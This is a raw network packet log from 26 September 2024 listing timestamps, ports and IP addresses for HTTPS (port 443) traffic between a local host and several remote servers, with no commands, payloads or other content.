Sep 26, 2024 17:55:23.923841000 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.923863888 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.923918009 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.923959970 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.923969984 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.925025940 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.925086975 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.925097942 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.925687075 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.925749063 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.925755978 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.928124905 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.928201914 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.928211927 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.930681944 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.930780888 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.930815935 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.932687044 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.932742119 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.932759047 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.935028076 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.935105085 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.935118914 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.937192917 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.937258005 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.937271118 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.939707994 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.939766884 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.939786911 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.941695929 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.941756010 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.941770077 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.945509911 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.945580959 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.945595026 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.946540117 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.946600914 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.946611881 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.949445009 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.949522972 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.949543953 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.951168060 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.951245070 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.951252937 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.955897093 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.955975056 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.955981970 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.956008911 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.956058025 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.956093073 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.960891962 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.960973024 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.960989952 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.961009979 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.961055994 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.961076975 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.972645998 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.972737074 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.972749949 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.972994089 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.973033905 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.973038912 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.973047018 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.973088026 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.973208904 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.973459959 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.973516941 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.973525047 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.976691008 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.976763010 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.976771116 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.976859093 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.976905107 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.976912975 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.981437922 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.981525898 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.981533051 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.981717110 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.981767893 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.981775045 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.983382940 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.983460903 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.983469009 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.985970020 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.986047983 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.986057043 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.988065958 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.988140106 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.988148928 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.990571022 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.990641117 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.990649939 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.992532015 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.992608070 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.992614985 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.995456934 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:23.995543957 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:23.995552063 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.000556946 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.000637054 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.000642061 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.000653982 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.000698090 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.006429911 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.011313915 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.011387110 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.011400938 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.011420965 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.011501074 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.011507988 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014388084 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014456034 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.014463902 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014543056 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014592886 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.014599085 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014656067 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.014703989 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.015750885 CEST	49707	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.015774965 CEST	443	49707	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.061891079 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.061974049 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.062083006 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.062458992 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.062493086 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.077661991 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.077718973 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.077816963 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.078012943 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.078027964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.125220060 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:24.236709118 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.236829996 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.236929893 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.237138033 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.237188101 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.433754921 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.434051037 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.434075117 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.434401989 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.434703112 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.434763908 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.434890985 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.434921026 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.635716915 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.635776997 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.635807991 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.635824919 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.635847092 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.635883093 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.635891914 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.637526989 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.637588024 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.638302088 CEST	49710	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.638314962 CEST	443	49710	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.660820961 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:24.660841942 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:24.660907984 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:24.661118984 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:24.661129951 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:24.728400946 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:24.730192900 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.732750893 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.735188007 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.735260010 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.735306025 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.735354900 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.735567093 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.735884905 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.735949993 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.736052990 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.736238956 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.736303091 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.736660957 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.736707926 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.736826897 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.736840010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.777170897 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.783411026 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.893209934 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.894597054 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.894659042 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.898108006 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.898199081 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.898525000 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.898590088 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.901599884 CEST	49720	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.901628971 CEST	443	49720	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.901729107 CEST	49720	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.902726889 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.902771950 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.902841091 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.903063059 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.903084993 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.903975964 CEST	49720	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.903985977 CEST	443	49720	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.904639959 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:24.904655933 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:24.950201988 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.009533882 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009568930 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009639978 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.009680033 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009721041 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009746075 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009779930 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.009799004 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.009851933 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.011042118 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.011188030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.011215925 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.011238098 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.011250973 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.011327028 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.011363983 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.015366077 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.015594006 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.015647888 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.015662909 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.017117023 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.017184019 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.017200947 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.017219067 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.017272949 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.017484903 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.021815062 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.021893978 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.021908045 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.023478985 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.023540020 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.023557901 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.028147936 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.028213978 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.028227091 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.029794931 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.029854059 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.029867887 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.078174114 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.078193903 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.101232052 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.101859093 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.101977110 CEST	443	49716	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.102057934 CEST	49716	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.122992039 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123155117 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123214960 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.123250961 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123692036 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123826027 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123846054 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123878002 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.123902082 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.123955011 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.124217033 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.124238968 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.124258041 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.124275923 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.124311924 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.125061989 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.129558086 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.129880905 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.129945040 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.129961014 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.130245924 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.130307913 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.130620003 CEST	49714	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.130652905 CEST	443	49714	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.134277105 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.134339094 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.134360075 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.135195017 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.135212898 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.135251999 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.135265112 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.135298967 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.135847092 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.137499094 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.137564898 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.137578964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.143316984 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.143379927 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.143404007 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.149641037 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.149698973 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.149714947 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.150321007 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.150369883 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.150434971 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.150643110 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.150660992 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.155127048 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.155158997 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.155190945 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.155209064 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.155246973 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.161359072 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.167192936 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.167262077 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.167287111 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215317011 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215447903 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.215477943 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215491056 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215544939 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.215581894 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215763092 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.215816021 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.215830088 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.216411114 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.216473103 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.216485977 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.219645977 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.219707966 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.219719887 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.219755888 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.219813108 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.219825029 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.224776030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.224849939 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.224863052 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.230536938 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.230606079 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.230632067 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.236756086 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.236825943 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.236834049 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.241435051 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.241491079 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.241497993 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.246001959 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.246062040 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.246069908 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.265574932 CEST	443	49715	172.217.16.132	192.168.2.16
